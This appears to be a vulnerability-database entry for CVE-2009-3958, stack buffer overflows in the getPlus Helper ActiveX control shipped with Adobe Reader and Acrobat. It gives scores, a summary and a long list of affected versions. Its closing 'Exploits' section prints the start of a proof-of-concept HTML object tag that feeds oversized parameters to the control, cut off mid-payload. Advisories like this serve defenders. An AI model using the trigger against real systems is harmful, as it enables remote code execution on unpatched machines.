10
CVSSv2

CVE-2009-3958

Published: 13/01/2010 Updated: 30/10/2018
CVSS v2 Base Score: 10 | Impact Score: 10 | Exploitability Score: 10
VMScore: 1000
Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C

Vulnerability Summary

Multiple stack-based buffer overflows in the NOS Microsystems getPlus Helper ActiveX control prior to 1.6.2.49 in gp.ocx in the Download Manager in Adobe Reader and Acrobat 9.x prior to 9.3, and 8.x prior to 8.2 on Windows and Mac OS X, might allow remote malicious users to execute arbitrary code via unspecified initialization parameters.

Vulnerable Product Search on Vulmon Subscribe to Product

adobe acrobat

adobe acrobat 8.1.6

adobe acrobat 8.1.5

adobe acrobat 7.1.3

adobe acrobat 7.1.2

adobe acrobat 7.0.5

adobe acrobat 7.0.4

adobe acrobat 6.0.4

adobe acrobat 6.0.3

adobe acrobat 4.0.5c

adobe acrobat 4.0.5a

adobe acrobat 9.1.3

adobe acrobat 9.1.2

adobe acrobat 8.1.4

adobe acrobat 8.1.3

adobe acrobat 7.1.1

adobe acrobat 7.1.0

adobe acrobat 7.0.3

adobe acrobat 7.0.2

adobe acrobat 6.0.2

adobe acrobat 6.0.1

adobe acrobat 6.0

adobe acrobat 4.0.5

adobe acrobat 4.0

adobe acrobat 9.1.1

adobe acrobat 9.1

adobe acrobat 8.1.2

adobe acrobat 8.1.1

adobe acrobat 8.1

adobe acrobat 7.0.9

adobe acrobat 7.0.8

adobe acrobat 7.0.1

adobe acrobat 7.0

adobe acrobat 5.0.6

adobe acrobat 5.0.5

adobe acrobat 3.1

adobe acrobat 3.0

adobe acrobat 9.0

adobe acrobat 8.1.7

adobe acrobat 8.0

adobe acrobat 7.1.4

adobe acrobat 7.0.7

adobe acrobat 7.0.6

adobe acrobat 6.0.6

adobe acrobat 6.0.5

adobe acrobat 5.0.10

adobe acrobat 5.0

adobe acrobat_reader 9.0

adobe acrobat_reader 8.1.7

adobe acrobat_reader 8.1.6

adobe acrobat_reader 7.1.0

adobe acrobat_reader 7.0.9

adobe acrobat_reader

adobe acrobat_reader 8.1.5

adobe acrobat_reader 8.1.4

adobe acrobat_reader 7.0.8

adobe acrobat_reader 7.0.7

adobe acrobat_reader 7.0

adobe acrobat_reader 7.1.1

adobe acrobat_reader 6.0

adobe acrobat_reader 5.1

adobe acrobat_reader 5.0

adobe acrobat_reader 4.5

adobe acrobat_reader 3.0

adobe acrobat_reader 9.1.3

adobe acrobat_reader 9.1.2

adobe acrobat_reader 8.1.2

adobe acrobat_reader 8.1.1

adobe acrobat_reader 7.0.6

adobe acrobat_reader 7.0.5

adobe acrobat_reader 7.1.3

adobe acrobat_reader 7.1.2

adobe acrobat_reader 5.0.9

adobe acrobat_reader 5.0.7

adobe acrobat_reader 4.0.5c

adobe acrobat_reader 4.0.5a

adobe acrobat_reader 7.0.2

adobe acrobat_reader 7.0.1

adobe acrobat_reader 6.0.3

adobe acrobat_reader 6.0.2

adobe acrobat_reader 6.0.1

adobe acrobat_reader 5.0.11

adobe acrobat_reader 5.0.10

adobe acrobat_reader 3.02

adobe acrobat_reader 3.01

adobe acrobat_reader 9.1.1

adobe acrobat_reader 9.1

adobe acrobat_reader 8.1

adobe acrobat_reader 8.0

adobe acrobat_reader 7.0.4

adobe acrobat_reader 7.0.3

adobe acrobat_reader 6.0.5

adobe acrobat_reader 6.0.4

adobe acrobat_reader 5.0.6

adobe acrobat_reader 5.0.5

adobe acrobat_reader 4.0.5

adobe acrobat_reader 4.0

Exploits

<object id=TestObj classid="CLSID:{E2883E8F-472F-4fb0-9522-AC9BF37916A7}" style="width:100;height:350"> <PARAM NAME="_cx" VALUE="0xFFFFFFFF"> <PARAM NAME="_cy" VALUE="0xFFFFFFFF"> <PARAM NAME="Service-URL" VALUE="xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx ...